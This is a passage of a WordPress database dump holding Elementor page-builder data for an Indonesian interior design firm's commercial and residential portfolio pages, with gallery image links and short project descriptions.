Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3723,4852,'_elementor_page_assets','a:0:{}'),(3724,4852,'_elementor_pro_version','3.8.1'),(3725,4852,'_elementor_css','a:6:{s:4:\"time\";i:1685436996;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3726,4853,'_wp_page_template','elementor_header_footer'),(3727,4853,'_elementor_edit_mode','builder'),(3728,4853,'_elementor_template_type','wp-page'),(3729,4853,'_elementor_version','3.8.1'),(3730,4853,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3731,4853,'_elementor_page_assets','a:0:{}'),(3732,4853,'_elementor_pro_version','3.8.1'),(3733,4853,'_elementor_css','a:6:{s:4:\"time\";i:1685436996;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3734,4854,'_wp_page_template','elementor_header_footer'),(3735,4854,'_elementor_edit_mode','builder'),(3736,4854,'_elementor_template_type','wp-page'),(3737,4854,'_elementor_version','3.8.1'),(3738,4854,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Commercial Project\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\\n\\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3739,4854,'_elementor_page_assets','a:0:{}'),(3740,4854,'_elementor_pro_version','3.8.1'),(3741,4854,'_elementor_css','a:6:{s:4:\"time\";i:1685436996;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3743,4855,'_wp_page_template','elementor_header_footer'),(3744,4855,'_elementor_edit_mode','builder'),(3745,4855,'_elementor_template_type','wp-page'),(3746,4855,'_elementor_version','3.8.1'),(3747,4855,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Kami memiliki keyakinan bahwa rumah adalah \\u201cLiving Space\\u201d atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3748,4855,'_elementor_page_assets','a:0:{}'),(3749,4855,'_elementor_pro_version','3.8.1'),(3750,4855,'_elementor_css','a:6:{s:4:\"time\";i:1695371823;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3751,4856,'_wp_page_template','elementor_header_footer'),(3752,4856,'_elementor_edit_mode','builder'),(3753,4856,'_elementor_template_type','wp-page'),(3754,4856,'_elementor_version','3.8.1'),(3755,4856,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Kami memiliki keyakinan bahwa rumah adalah \\u201cLiving Space\\u201d atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3756,4856,'_elementor_page_assets','a:0:{}'),(3757,4856,'_elementor_pro_version','3.8.1'),(3758,4856,'_elementor_css','a:6:{s:4:\"time\";i:1695371823;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3759,4857,'_wp_page_template','elementor_header_footer'),(3760,4857,'_elementor_edit_mode','builder'),(3761,4857,'_elementor_template_type','wp-page'),(3762,4857,'_elementor_version','3.8.1'),(3763,4857,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Bauhaus Residential Projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Kami memiliki keyakinan bahwa rumah adalah \\u201cLiving Space\\u201d atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3764,4857,'_elementor_page_assets','a:0:{}'),(3765,4857,'_elementor_pro_version','3.8.1'),(3766,4857,'_elementor_css','a:6:{s:4:\"time\";i:1695371823;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3767,4858,'_wp_page_template','elementor_header_footer'),(3768,4858,'_elementor_edit_mode','builder'),(3769,4858,'_elementor_template_type','wp-page'),(3770,4858,'_elementor_version','3.8.1'),(3771,4858,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Commercial Project\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\\n\\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3772,4858,'_elementor_page_assets','a:0:{}'),(3773,4858,'_elementor_pro_version','3.8.1'),(3774,4859,'_wp_page_template','elementor_header_footer'),(3775,4859,'_elementor_edit_mode','builder'),(3776,4859,'_elementor_template_type','wp-page'),(3777,4859,'_elementor_version','3.8.1'),(3778,4859,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Commercial Project\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\\n\\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3779,4859,'_elementor_page_assets','a:0:{}'),(3780,4859,'_elementor_pro_version','3.8.1'),(3781,4860,'_wp_page_template','elementor_header_footer'),(3782,4860,'_elementor_edit_mode','builder'),(3783,4860,'_elementor_template_type','wp-page'),(3784,4860,'_elementor_version','3.8.1'),(3785,4860,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Bahaus Commercial Projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\\n\\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New 